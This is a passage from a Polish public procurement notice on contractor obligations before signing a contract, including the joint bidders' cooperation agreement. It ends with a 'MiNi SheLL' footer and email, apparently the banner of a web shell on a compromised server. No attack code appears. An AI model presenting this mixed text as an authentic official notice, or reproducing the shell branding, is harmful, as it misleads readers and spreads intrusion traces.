zamówienie, o miejscu i terminie zawarcia umowy.<br/>2. Wykonawca przed zawarciem umowy:<br/>- poda wszelkie informacje niezbędne do wypełnienia treści umowy na wezwanie zamawiającego,<br/>- jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców, w której m.in. zostanie określony pełnomocnik uprawniony do kontaktów z zamawiającym oraz do wystawiania dokumentów związanych z płatnościami, przy czym termin, na jaki została zawarta umowa, nie może być krótszy niż termin realizacji zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com